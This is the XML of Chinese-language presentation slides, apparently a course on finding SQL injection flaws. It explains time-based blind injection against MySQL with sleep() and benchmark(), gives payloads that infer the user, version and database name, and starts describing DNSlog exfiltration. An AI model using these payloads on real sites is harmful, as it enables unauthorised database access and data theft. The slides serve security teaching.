          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>延迟注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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延迟注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>延时注入是通过页面返回的时间来判断的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不同的mysql数据库版本，延迟注入语句也不同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql &gt;=5.0  的可以使用sleep()进行查询</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql&lt;5.0  的可以使用benchmark()进行查询</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>benchmark用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>benchmark(n,sql语句)  n为查询次数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过查询次数增多 时间变得缓慢来判断是否存在延迟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select benchmark(1000,select * from admin) ;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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0" y="0"/>
            <a:ext cx="3590925" cy="6899910"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="5561351" cy="6899639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="5561351" cy="6858002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId2">
                <a:extLst>
                  <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                    <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <a14:imgLayer r:embed="rId3">
                        <a14:imgEffect>
                          <a14:brightnessContrast bright="20000" contrast="-40000"/>
                        </a14:imgEffect>
                        <a14:imgEffect>
                          <a14:saturation sat="200000"/>
                        </a14:imgEffect>
                      </a14:imgLayer>
                    </a14:imgProps>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect r="-119980"/>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 name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="5561351" cy="6899639"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="157E9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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="871855" y="887730"/>
            <a:ext cx="1660525" cy="1050925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Levenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5805805" y="416560"/>
            <a:ext cx="4501515" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>各种提交方式的注入漏洞挖掘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135245" y="518795"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5476240" y="876300"/>
            <a:ext cx="4223385" cy="1905"/>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818505" y="1153160"/>
            <a:ext cx="3398520" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>伪静态注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147945" y="1255395"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接连接符 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5488940" y="1612900"/>
            <a:ext cx="4223385" cy="1905"/>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5828030" y="1885950"/>
            <a:ext cx="4269105" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>延迟注入漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>+dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5157470" y="1988820"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="直接连接符 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5498465" y="2346325"/>
            <a:ext cx="4223385" cy="1905"/>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5840730" y="2623185"/>
            <a:ext cx="3858260" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>编码注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5170170" y="2725420"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="直接连接符 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5511165" y="3082925"/>
            <a:ext cx="4223385" cy="1905"/>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840730" y="3294380"/>
            <a:ext cx="4501515" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>二阶注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5170170" y="3396615"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接连接符 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5511165" y="3754120"/>
            <a:ext cx="4223385" cy="1905"/>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5853430" y="4030980"/>
            <a:ext cx="3398520" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>PHPv9 authkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182870" y="4133215"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接连接符 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5523865" y="4490720"/>
            <a:ext cx="4223385" cy="1905"/>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5862955" y="4764405"/>
            <a:ext cx="3871595" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>实体注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5192395" y="4866640"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5533390" y="5224145"/>
            <a:ext cx="4223385" cy="1905"/>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5875655" y="5501005"/>
            <a:ext cx="3858260" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞挖掘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5205095" y="5603240"/>
            <a:ext cx="318770" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5546090" y="5960745"/>
            <a:ext cx="4223385" cy="1905"/>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延迟注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="1570990"/>
            <a:ext cx="10515600" cy="4916170"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="65000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep()延迟注入用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep 可以强制产生一个固定的延迟。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep()延迟注入核心原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and if(true,sleep(5),0); ==IF(1=1, true, false);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1 and sleep(5)  判断下是否存在延迟注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and if(substring(user(),1,4)='root',sleep(5),1) 判断当前用户</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and if(MID(version(),1,1) LIKE 5, sleep(5), 1)  判断数据库版本信息是否为5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以去猜解他的数据库名称</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and if(ascii(substring(database(),1,4))&gt;100,sleep(5),1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and If(ascii(substr(database(),1,1))&lt;115,sleep(10),1)--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and If(length((version()))=6,sleep(10),1)--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap --time-sec=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 延迟注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>手工时间盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://blog.csdn.net/DarkHQ/article/details/79274376</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dnslog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台会记录域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询记录，通过我们把查询的结果和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>子域名拼接，发送给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
